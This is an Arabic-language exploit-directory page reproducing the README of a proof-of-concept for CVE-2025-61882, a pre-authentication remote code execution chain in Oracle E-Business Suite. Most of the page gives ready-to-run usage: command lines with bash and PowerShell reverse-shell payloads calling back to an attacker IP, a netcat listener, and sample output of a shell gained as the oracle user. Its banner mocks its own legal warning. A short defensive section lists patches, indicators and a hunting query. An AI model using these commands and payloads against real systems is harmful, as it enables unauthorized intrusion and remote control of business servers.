Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61882-POC — استغلال لـ CVE-2025-61882، وهو ثغرة RCE حرجة قبل المصادقة في Oracle E-Business Suite. يجمع بين SSRF، وحقن CRLF، وتهريب HTTP، وحقن XSLT لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة. | Kitploit
أدوات/GitHubGitHub/mindflarex/cve-2025-61882-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

استغلال لـ CVE-2025-61882، وهو ثغرة RCE حرجة قبل المصادقة في Oracle E-Business Suite. يجمع بين SSRF، وحقن CRLF، وتهريب HTTP، وحقن XSLT لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة.

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة اختبار أمان CVE-2025-61882

CVSS Status Platform License

🚨 تحذير قانوني بالغ الأهمية

انظر منشور مدونتنا للتفاصيل الفنية

هذه الأداة مخصصة لاختبار الأمان المصرح به فقط

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني 🚨   ║
║                                                              ║
║  باستخدام هذه الأداة، فإنك تقر وتوافق على أن:                ║
║                                                              ║
║                                                              ║
║                 فقط قم بتشغيلها واخترق (FCK THIS JUST RUN AND HACK) ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 نظرة عامة

أداة اختبار أمان لـ CVE-2025-61882، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على Oracle E-Business Suite.

تم إنشاؤها بواسطة: Mindflare

تفاصيل الثغرة

  • CVE ID: CVE-2025-61882
  • نقاط CVSS: 9.8 (حرجة)
  • ناقل الهجوم: الشبكة (بدون مصادقة)
  • تعقيد الهجوم: متوسط
  • الصلاحيات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • الإصدارات المتأثرة: Oracle E-Business Suite 12.2.3 - 12.2.14
  • حالة التصحيح: تم إصدار تصحيح طارئ في 4 أكتوبر 2025
  • حالة الاستغلال: ⚠️ مُستغل بنشاط بواسطة برمجية فدية Cl0p منذ أغسطس 2025

ملخص فني

CVE-2025-61882 هو سلسلة استغلال متطورة تجمع بين خمس ثغرات منفصلة:

  1. SSRF - تزوير الطلبات من جانب الخادم عبر /OA_HTML/configurator/UiServlet
  2. حقن CRLF – حقن رؤوس HTTP في معامل return_url
  3. تهريب HTTP – إساءة استخدام اتصالات Keep-alive للوصول إلى الخدمات الداخلية (المنفذ 7201)
  4. تجاوز المصادقة – اجتياز المسار عبر البادئة /OA_HTML/help/../
  5. حقن XSLT – معالجة قالب XSL ضار يؤدي إلى تنفيذ تعليمات برمجية عن بُعد

🎯 حالات الاستخدام المقصودة

✅ الاستخدام المقبول

  • اختبار الاختراق المصرح به مع إذن كتابي
  • البحث الأمني على أنظمة تمتلكها
  • التحقق من الثغرات في بيئات معملية خاضعة للرقابة
  • تمارين الفريق الأحمر مع توثيق النطاق المناسب
  • بحث أكاديمي بموافقة مؤسسية
  • الاستجابة للحوادث والتحليل الجنائي

❌ الاستخدام المحظور

  • أي وصول غير مصرح به للنظام
  • اختبار أنظمة دون إذن كتابي صريح
  • أنشطة ضارة أو التسبب في ضرر
  • مهاجمة أنظمة الإنتاج دون موافقة
  • استخدام الأداة لأغراض إجرامية
  • أي نشاط ينتهك القوانين المعمول بها

📦 التثبيت

المتطلبات الأساسية

  • Python 3.7 أو أعلى
  • مدير الحزم pip
  • اتصال شبكة بالهدف (مسموح به فقط)
  • مستمع Netcat أو ما شابه لاستقبال الشل العكسي

الإعداد

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# تثبيت التبعيات
pip3 install -r requirements.txt

# جعل السكريبت قابل للتنفيذ (لينكس/ماك)
chmod +x cve-2025-61882-detector.py

🚀 الاستخدام

الخطوة 1: إعداد المستمع الخاص بك

في طرفية منفصلة، ابدأ مستمع netcat:

root@kitploit:~
# لينكس/ماك
nc -lvnp 4444

# ويندوز
nc.exe -lvnp 4444

الخطوة 2: تشغيل الأداة

الاستخدام الأساسي (هدف لينكس):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

هدف ويندوز:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

المعاملات

المعاملالوصفمطلوبمثال
--targetرابط Oracle EBS الهدفنعمhttp://192.168.1.22:8000
--lhostعنوان IP الخاص بك (للاتصالات الراجعة)نعم192.168.1.10
--lportمنفذ خادم HTTP (يخدم حمولة XSL)نعم80 أو 8080
--commandالأمر المراد تنفيذه على الهدفنعمانظر الأمثلة أعلاه
--platformنظام تشغيل الهدف: linux أو windowsنعمlinux

📊 مثال على المخرجات

مخرجات الأداة

root@kitploit:~
[*] رابط الهدف:    http://192.168.1.22:8000
[*] عنوان IP للمستمع:   192.168.1.10
[*] منفذ المستمع: 80
[*] المنصة:      linux

[*] بدأ خادم HTTP على 192.168.1.10:80
[*] الاتصال بالهدف لاسترداد رمز CSRF...
[*] رمز CSRF: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] تحضير هيكل تهريب HTTP...
[*] إرسال الحمولة الاستغلالية...
[*] تم إرسال الحمولة الاستغلالية بنجاح

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] تم تقديم حمولة XSL بنجاح

مخرجات مستمع Netcat (إذا كان الهدف ضعيفًا)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ الاكتشاف والدفاع

لمدافعي الأمن

إجراءات فورية

  1. تطبيق تصحيح Oracle الطارئ (معرف الوثيقة: 30061882.1)
  2. البحث عن اختراق:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. مراجعة سجلات الوصول منذ أغسطس 2025
  4. حظر الإنترنت الصادر من خوادم EBS

مؤشرات الاكتشاف

مؤشرات الشبكة:

root@kitploit:~
200.107.207.26 (خادم C2 لـ Cl0p)
161.97.99.49 (ثانوي)

أنماط HTTP:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • أحرف CRLF في المعاملات

📚 المراجع

  • تنبيه Oracle الأمني
  • كتالوج الثغرات المعروفة المستغلة (CISA KEV)
  • تحليل Google/Mandiant
  • بحث watchTowr Labs

📜 الترخيص

رخصة MIT مع قيود الاستخدام التعليمي - انظر LICENSE

إخلاء مسؤولية: هذا البرنامج مخصص لاختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


root@kitploit:~

**تم إنشاؤها بواسطة:** Mindflare | **آخر تحديث:** أكتوبر 2025
تنزيل الأداة